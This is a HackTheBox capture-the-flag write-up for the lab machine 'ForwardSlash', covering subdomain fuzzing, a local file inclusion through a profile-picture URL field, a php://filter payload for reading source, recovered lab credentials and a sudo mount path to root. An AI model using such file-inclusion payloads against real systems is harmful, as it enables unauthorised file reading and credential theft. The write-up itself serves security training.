Open in app

Sign in

Write

Sign in

ForwardSlash Writeup — HackTheBox

REBRON SECURITY
SUDOROOT
Published in
5 min readJul 4, 2020

Made by RebornSec ®

Machine Maker(s) :

Overview :

  • Finding the Subdomain using wfuzz
  • Testing for Local File Inclusion
  • Extract/devdir content
  • Login as Chiv
  • After analyzing the binary backup and config.php.bak getting pain credentials
  • Login as Pain
  • We getUser.txt
  • Fixing the python script from the dir encryptorinator
  • Getting the key from the encrypted ciphertext.
  • Mounting the Images to /mnt after using that key.
  • Login as Root
  • We get root.txt

Enumeration phase :

As usual let’s start with the Nmap scan :

[~] Nmap -sC -sV 10.10.10.183

Let’s check web page on port 80 :

It looks like the web server got hacked.

Let’s dig if we find any subdomain :

And we got subdomain backup.forwardslash.htb lets add it to our hosts.

Let’s check it the browser :

I tried the standard ways to bypass the login credentials but it didn’t work, so signed up :

Logging in using my own credentials i got this dashboard :

Digging in i found possibility to LFI in the section Change Your Profile Picture :

Using BurpSuite to check the LFI vulnerability starting using file:///etc/passwdand i got a valid result :

Also, i can read a file in the subdomain directory file:///var/www/backup.forwardslash.htb/config.php:

I kept enumerating for possible directories using wfuzz and i got /dev :

And we found our wanted file but we need to converted to base64 to be able to extract it so used

url=php://filter/convert.base64-encode/resource=file:///var/www/backup.forwardslash.htb/dev/index.php

Now we decrypt it :

We got ftp credentials for chiv as N0bodyL1kesBack/ :

We don’t see ftp open, so let’s try to ssh in :

User we search for is not chiv, so we are looking for a way to be as the user pain , digging more i found backup binary owned by user pain looking into that we see that it create a md5 hash of the current timestamp and if that is present it backup the current directory so let’s try to read the file /var/backup/config.php.bak but i got permission denied so i found a note.txt validate my idea :

So i made script to read backup and get the md5sum of that timestamp and get that link and try backup again :

And i got a positive result :

The new credential is : pain:db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704

Now we su as pain :

And now we claim our user.txt :

Root phase :

Running sudo -l i get this result :

So am able to mount images in /dev/mapper/ as root, plus there is python file contain some sort of way to decrypt the ciphertext but it needs to be fixed, and this the fixed file :

And i got a valid result :

So the key for the encrypted image is : cB!6%sdH8Lj^@Y*$C2cf

Now we can mount our image :

And let’s see what mnt contains :

We got rsa key id_rsa let’s try to connect with it to root :

VOILÀ we got our root.txt :)

I wish the journey was fun. Don’t forget to check my last writeups.

Forwardslash
Linux
Hackthebox
Writeup
Htb

--

--

REBRON SECURITY
SUDOROOT

Written by REBRON SECURITY

13 Followers
Editor for

Cyber Security Specialist

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams